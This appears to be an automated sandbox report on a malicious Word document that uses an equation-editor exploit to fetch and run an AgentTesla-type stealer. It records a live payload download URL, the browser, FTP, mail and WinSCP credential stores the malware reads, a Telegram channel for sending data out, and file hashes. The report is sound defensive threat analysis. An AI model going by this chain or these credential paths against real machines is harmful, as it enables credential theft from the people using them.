                      Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: !Progman
                      Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeQueries volume information: C:\Users\user\AppData\Roaming\gudostrp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeQueries volume information: C:\Users\user\AppData\Roaming\gudostrp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1Windows Management Instrumentation211Valid Accounts1Valid Accounts1Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Process Injection112Obfuscated Files or Information11Security Account ManagerSecurity Software Discovery22SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationEncrypted Channel11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptValid Accounts1LSA SecretsVirtualization/Sandbox Evasion141SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol24Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonModify Registry1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion141Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection112/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 502700 Sample: Purchase Order_0131021.doc Startdate: 14/10/2021 Architecture: WINDOWS Score: 100 29 Found malware configuration 2->29 31 Antivirus detection for URL or domain 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 11 other signatures 2->35 7 EQNEDT32.EXE 11 2->7         started        12 WINWORD.EXE 291 25 2->12         started        process3 dnsIp4 27 palangavra.lt 144.76.47.167, 49167, 80 HETZNER-ASDE Germany 7->27 21 C:\Users\user\AppData\Roaming\gudostrp.exe, PE32 7->21 dropped 23 C:\Users\user\AppData\...\gufoxqa[1].exe, PE32 7->23 dropped 45 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->45 14 gudostrp.exe 2 7->14         started        file5 signatures6 process7 signatures8 47 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->47 49 Machine Learning detection for dropped file 14->49 51 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->51 53 2 other signatures 14->53 17 gudostrp.exe 12 2 14->17         started        process9 dnsIp10 25 api.telegram.org 149.154.167.220, 443, 49169 TELEGRAMRU United Kingdom 17->25 37 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->37 39 Tries to steal Mail credentials (via file access) 17->39 41 Tries to harvest and steal ftp login credentials 17->41 43 Tries to harvest and steal browser information (history, passwords, etc) 17->43 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Purchase Order_0131021.doc37%VirustotalBrowse
                      Purchase Order_0131021.doc36%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\gudostrp.exe100%Joe Sandbox ML

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.2.gudostrp.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://SwonTwAJYn3XCAV3.net0%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://api.telegram.orgP0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://palangavra.lt/jukiestay/gufoxqa.exe100%Avira URL Cloudmalware
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://yBlQIu.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high
                        palangavra.lt
                        		144.76.47.167
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://palangavra.lt/jukiestay/gufoxqa.exetrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://SwonTwAJYn3XCAV3.netgudostrp.exe, 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://DynDns.comDynDNSgudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmpfalse
                            		high
                            https://api.telegram.orggudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpfalse
                              		high
                              http://crl.entrust.net/server1.crl0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                		high
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hagudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://ocsp.entrust.net03gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.telegram.orgPgudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.%s.comPAgudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		low
                                http://www.diginotar.nl/cps/pkioverheid0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://api.telegram.orggudostrp.exe, 00000005.00000002.722444907.00000000023FF000.00000004.00000001.sdmpfalse
                                  		high
                                  http://ocsp.entrust.net0Dgudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namegudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpfalse
                                    		high
                                    https://secure.comodo.com/CPS0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipgudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://yBlQIu.comgudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.entrust.net/2048ca.crl0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                        		high

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        149.154.167.220
                                        		api.telegram.orgUnited Kingdom
                                        		62041TELEGRAMRUfalse
                                        144.76.47.167
                                        		palangavra.ltGermany
                                        		24940HETZNER-ASDEtrue

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:502700
                                        Start date:14.10.2021
                                        Start time:10:22:11
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 18s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:Purchase Order_0131021.doc
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:7
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winDOC@6/9@3/2
                                        EGA Information:Failed
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                        • TCP Packets have been reduced to 100
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        10:22:15API Interceptor392x Sleep call for process: EQNEDT32.EXE modified
                                        10:22:17API Interceptor1408x Sleep call for process: gudostrp.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        149.154.167.220SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exeGet hashmaliciousBrowse
                                          ek3dgxlAe0.exeGet hashmaliciousBrowse
                                            invoice.exeGet hashmaliciousBrowse
                                              Ff24G0gf7c.exeGet hashmaliciousBrowse
                                                Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.htmlGet hashmaliciousBrowse
                                                  Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                    21ITQXL080104122T7.exeGet hashmaliciousBrowse
                                                      SWIFT_BANKTIA_729928920222.exeGet hashmaliciousBrowse
                                                        R0987653400008789.exeGet hashmaliciousBrowse
                                                          T98765434567898.exeGet hashmaliciousBrowse
                                                            LbmGlrja1Z.exeGet hashmaliciousBrowse
                                                              photos jpg.exeGet hashmaliciousBrowse
                                                                mGaZYvxAsr.exeGet hashmaliciousBrowse
                                                                  vbyltST1At.exeGet hashmaliciousBrowse
                                                                    PO B 12.exeGet hashmaliciousBrowse
                                                                      DHL Shipping Documents REF - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                        1st file name DHL - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                          DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exeGet hashmaliciousBrowse
                                                                            PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                              Message bounce.exeGet hashmaliciousBrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                api.telegram.orgSecuriteInfo.com.Suspicious.Win32.Save.a.2604.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                presupuesto.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                ek3dgxlAe0.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                invoice.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Ff24G0gf7c.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.htmlGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                21ITQXL080104122T7.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                SWIFT_BANKTIA_729928920222.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                R0987653400008789.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                T98765434567898.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                LbmGlrja1Z.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                photos jpg.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                mGaZYvxAsr.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                vbyltST1At.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PO B 12.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                DHL Shipping Documents REF - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                1st file name DHL - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                TELEGRAMRU6GKjXSaJ8E.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                ek3dgxlAe0.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                invoice.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Ff24G0gf7c.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.htmlGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                21ITQXL080104122T7.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                JetCe3om9L.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                frj4kNTbl3.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                F6RhtCVeTD.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                SWIFT_BANKTIA_729928920222.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                R0987653400008789.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                T98765434567898.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                LbmGlrja1Z.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                photos jpg.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                ET13QJzgLL.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                mGaZYvxAsr.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                install.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                vbyltST1At.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                HETZNER-ASDEAj#U00e1nlatk#U00e9r#U00e9s 2021.xlsmGet hashmaliciousBrowse
                                                                                • 136.243.159.53
                                                                                vbc.exeGet hashmaliciousBrowse
                                                                                • 116.202.174.203
                                                                                GR01DtRd0N.exeGet hashmaliciousBrowse
                                                                                • 88.99.75.82
                                                                                Payment_Swift,png.exeGet hashmaliciousBrowse
                                                                                • 78.46.56.160
                                                                                PO 211011-021A.exeGet hashmaliciousBrowse
                                                                                • 136.243.159.53
                                                                                S27f5MP8UeGet hashmaliciousBrowse
                                                                                • 5.75.211.8
                                                                                75lT7DuXrs.exeGet hashmaliciousBrowse
                                                                                • 168.119.93.163
                                                                                #Ud83d#Udcde-youse.guia-644-46204-282109.htmGet hashmaliciousBrowse
                                                                                • 95.217.53.76
                                                                                6Vk012xoynGet hashmaliciousBrowse
                                                                                • 144.79.90.35
                                                                                tmDSSwkOAMGet hashmaliciousBrowse
                                                                                • 94.130.40.209
                                                                                8r3HRghvXXGet hashmaliciousBrowse
                                                                                • 95.217.66.142
                                                                                ARK Survival legit hack by Spyro.exeGet hashmaliciousBrowse
                                                                                • 135.181.170.169
                                                                                M12s7KNFDg.exeGet hashmaliciousBrowse
                                                                                • 138.201.79.103
                                                                                NBA 2K21 Cheat by Spyro.exeGet hashmaliciousBrowse
                                                                                • 135.181.170.169
                                                                                Gsdqz.dllGet hashmaliciousBrowse
                                                                                • 116.203.98.109
                                                                                4tOOUNDwaW.exeGet hashmaliciousBrowse
                                                                                • 188.34.163.98
                                                                                7ofFMoirr5.exeGet hashmaliciousBrowse
                                                                                • 188.34.163.98
                                                                                HUTWMrDhov.dllGet hashmaliciousBrowse
                                                                                • 116.203.98.109
                                                                                SecuriteInfo.com.W32.AIDetect.malware1.10225.exeGet hashmaliciousBrowse
                                                                                • 188.34.163.98
                                                                                0q3K4qJqQT.exeGet hashmaliciousBrowse
                                                                                • 88.99.75.82

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                36f7277af969a6947a61ae0b815907a1Order EQE0905.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Order EQE090.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PO2008095.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Order List.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                DHL Original Documents.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Purchase Order List.xlsmGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                img_Especificaci#U00f3n_07102021.docGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Purchase Order_0190.doc__.rtfGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PO. 2100002.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                04OCT2021-USD-178,750.00.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                TT remittance.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                TT form.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                04OCT2021-USD-178,750.00.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                especificaci#U00f3n 0021.docGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                RF Quotation_04102021.docGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                SteelTrading PO-5579.xlsx.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                IMG_PO-000120741.docGet hashmaliciousBrowse
                                                                                • 149.154.167.220

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:downloaded
                                                                                Size (bytes):486912
                                                                                Entropy (8bit):6.778690362170083
                                                                                Encrypted:false
                                                                                SSDEEP:12288:SEIG72hsEtDtc2gksrW6p8/PNvX3ivqINRb:EKoDtFFsrE/VP3ivqINRb
                                                                                MD5:BC5F0AA0262021DB5921D726F7A5B820
                                                                                SHA1:B41245E3BBFC8A7905BFC56B88EA79975595F4F6
                                                                                SHA-256:B227A0AE42AA451635BCE6E3D50A05D895A3B6FA479B6882A548721A38091F25
                                                                                SHA-512:A62ABA917BE2EEC67B82CF15A09EC34F8BB2D94098C0674858081B6B075E10E1195DB1947CAD445FFEBF4503BFAAD55EFF861DE93B81BBFB57163B7592E9C114
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                IE Cache URL:http://palangavra.lt/jukiestay/gufoxqa.exe
